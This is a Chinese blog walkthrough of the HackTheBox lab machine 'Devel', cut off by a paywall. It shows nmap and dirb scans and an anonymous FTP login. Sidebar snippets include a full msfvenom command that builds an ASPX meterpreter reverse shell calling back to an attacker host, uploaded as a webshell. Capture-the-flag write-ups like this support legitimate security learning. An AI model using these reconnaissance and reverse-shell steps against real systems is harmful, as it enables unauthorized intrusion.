Hackthebox:Devel Walkthrough

最新推荐文章于 2022-10-28 22:27:22 发布
最新推荐文章于 2022-10-28 22:27:22 发布
阅读量374 收藏
点赞数
分类专栏: Hackthebox 文章标签: 安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/alexhcf/article/details/110699389
版权
本文详细介绍了如何利用安全漏洞攻破Hackthebox中的Devel目标。从匿名FTP登录、文件上传到扫描端口、探测Web服务,再到利用aspx木马获取shell,并进一步尝试提权,内容涵盖了信息收集、漏洞利用和后渗透的全过程。
摘要由CSDN通过智能技术生成

预备知识

ftp anonymous登录、任意文件上传、msfvenom生成webshell、meterpreter后渗透

信息收集

nmap 探测一下开放端口和服务

nmap 10.10.10.5

结果如下

Nmap scan report for 10.10.10.5
Host is up (0.34s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 29.83 seconds

有个http的80端口,那么应该有web服务了,老规矩扫一下目录

扫一下目录

dirb http://10.10.10.5/

在扫目录的间歇,扫一扫有没有已知的漏洞nmap -script=vuln 10.10.10.5 不过后来没有扫出来什么

两边都在扫,不浪费时间,试一试ftp能不能匿名登录

ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.

发现这里有个目录比较有趣

ftp> cd aspnet_client
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          system_web
226 Transfer complete.
ftp> cd system_web
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          2_0_50727
226 Transfer complete.
ftp> cd  2_0_50727
250 CWD command successful.
ftp> dir
200
最低0.47元/天 解锁文章
尸者狗
关注
专栏目录
hackthebox-Devel (考点:ftp/IIS/windows)不用msf
冬萍子癸水
04-09 392
用msf做很快,很多人做这台机器写writeup也是用msf做的。但针对oscp,本篇文章不用msf nmap 看到21ftp要想到进去看看,找敏感文件 匿名anonymous进入 也没啥。但是你也有可能看到一些shell已经在里面了,那是因为之前有人做的留下的。开启机器,不一定会全部重置,会有前人的痕迹。我发现是这样。 可以看到IIS的图片。 再看80 扫描,没什么发现 打开80网页10.1...
HackTheBox-Devel渗透测试
weixin_43111940的博客
04-15 210
端口信息 sudo nmap -sC -sV -A -p 21,80 10.10.10.5 匿名访问21端口,把里面的文件下载下来 访问80端口,是IIS7.0的 查看源码也没有什么收获 目录扫描发现了/aspnet_client 目录 gobuster dir -u http://10.10.10.5:80 -w /usr/share/wordlists/dirb/common.txt 重点来了,/aspnet_client就是ftp里发现的文件夹!(其实看到有iisstart.htm也可以猜
Hack the box靶机 Devel
菜浪马废的博客
05-27 275
Web服务器[IIS支持.aspx .asp文件] 做了两个windows的 walkthrough都是教用msf提权的 难道我msf一定要用到win上么?
Hack The Box::Devel
aya3t的博客
10-10 188
Hack The Box::Devel
hack the box devel靶机
zr1213159840的博客
04-23 2441
打开靶机,开扫,能看出来开了ftp和80端口,而且ftp能匿名访问。 nmap -sV -Pn -A 10.10.10.5 访问地址能发现就是IIS的界面,本来想着下面也许会有东西,但是爆破后没东西。登录一下ftp,发现进了网站的目录,测试上传的东西后,确实是网站的目录,那么就可以上传木马了。 生成asp木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.15 LPORT=4444 -f aspx -o shell.aspx 在
db4-devel和libcap-devel
11-12
在linuxpython安装过程中可能会有db4-devel和libcap-devel不能知道的问题可下载文档使用rpm -ivh libpcap-1.9.0-3.el8.x86_64.rpm libpcap-devel-1.9.0-3.el8.x86_64.rpm libdb4-4.8.30-30.el8.x86_64.rpm libdb4-...
openssl-devel-1.1.1o-1.el7.x86_64.rpm openssl-devel
05-23
openssl-devel-1.1.1o-1.el7.x86_64 openssl-devel openssl openssl rpm包
Name : ncurses-devel Version : 5.7
09-19
Install the ncurses-devel package if you want to develop applications which will use ncurses. Use the following compiler flags to build against the ncurses library: -lncurses (compile and link ...
openssl-devel-1.0.2k-19.el7.x86_64.rpm
03-19
openssl-devel-1.0.2k-19.el7.x86_64.rpm的离线包,centos7版本的。
CentOS7 nginx离线安装gcc/pcre-devel/openssl-devel/zlib-devel
01-04
本教程将详细介绍如何在CentOS 7上离线安装GCC、PCRE-devel、OpenSSL-devel和Zlib-devel这些重要的开发工具包,这些都是构建和编译Nginx web服务器所必需的依赖。以下是一个详细的步骤指南。 首先,`CentOS7 nginx...
【Hack The Box】windows练习-- devel
人间体佐菲的博客
10-28 1156
【Hack The Box】windows练习-- devel
Hackthebox :: Devel反思总结
Soul Blog
11-22 381
Hackthebox :: Devel反思总结 develhackthebox上一台简单的windows靶机,我将对其主要内容进行总结与反思 反思 对FTP服务的命令不够熟悉 对msfvenom制作载荷不够熟,msfvenom中变量lhost和lport后面接 ” = “再接参数 总结 部分FTP命令 .aspx是一个动态网络页面文件 扫描的21号FTP端口看到的信息中,Anonymous FTP login allowed代表着允许匿名登录,iisstart.htm 告知我们在msf
No.68-HackTheBox-windows-Devel-Walkthrough渗透学习
qq_34801745的博客
03-14 436
** HackTheBox-windows-Devel-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/3 靶机难度:初级(3.9/10) 靶机发布日期:2017年10月3日 靶机描述: Devel, while relatively simple, demonstrates the security risk...
HTB Devel[Hack The Box HTB靶场]writeup系列3
重新启程
02-01 2710
Retired Machines的第三台机器Devel 目录 0x00 靶机情况 0x01 端口扫描 0x02 ftp服务 0x03 上传payload 0x04 get webshell 0x05 提权 0x00 靶机情况 从靶机的情况来看,难度属于初级,基本上都是选择1、2、3分为主,操作系统是windows 0x01 端口扫描 看看靶机提供了哪些服务: roo...
Windows信息收集、渗透测试常用命令 (゚益゚メ) 渗透测试
寻觅的博客
02-24 2060
文章目录工作组介绍 工作组 介绍 工作组是
windows提权
weixin_43873557的博客
02-10 348
windows-kernel-exploits(Windows平台提权漏洞集合): https://github.com/SecWiki/windows-kernel-exploits WMIC信息收集 WMIC:Windows管理工具命令行,提供了从命令行接口和批命令脚本执行系统管理的支持,对于信息收集和渗 透测试是非常实用的。 wmic信息提取脚本:wmic_info.bat 提取进程、服务、用户帐号、用户组、网络接口、硬盘信息、网络共享信息、安装Windows补丁、程序在启动运 行、安装的软件列表、操
最详尽系统服务和木马默认端口表(安全相关)
热门推荐
漂流的日子
12-04 1万+
最详尽系统服务和木马默认端口表(安全相关)-,1,tcpmux,TCP Port Service Multiplexer-,2,compressnet,Management Utility-,3,compressnet,Compression Process-,5,rje,Remote Job Entry-,7,echo,Echo-,9,discard,Discard-,11,systat,Act
VirtualBox搭建Android-x86
weixin_30550271的博客
03-02 266
最近想学习appium框架,但是在windows的版本要求API17以上,即Android4.2以上,模拟器的速度实在难以恭维,自己的真机版本也只有android4.1,所以只能求助android-x86。 第一部分:基础安装配置 从http://www.android-x86.org/download下载iso文件,选择eeepc版本,目前选择的是android-x86-4.0-RC...
hackthebox-conceal(考点:161/ike/IIS/win10/juicy-potato)
冬萍子癸水
04-18 953
namp C:\root\Desktop> nmap -A 10.10.10.116 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-18 04:34 EDT Nmap scan report for 10.10.10.116 Host is up (0.26s latency). All 1000 scanned ports on 10...
docker tensorflow/tensorflow:devel 没有运行?
最新发布
05-18
docker pull tensorflow/tensorflow:devel ``` 3. 确保您的 Docker 容器已经正确启动并运行。您可以使用以下命令来检查: ``` docker ps ``` 如果您的容器没有运行,请使用以下命令来启动它: ``` ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值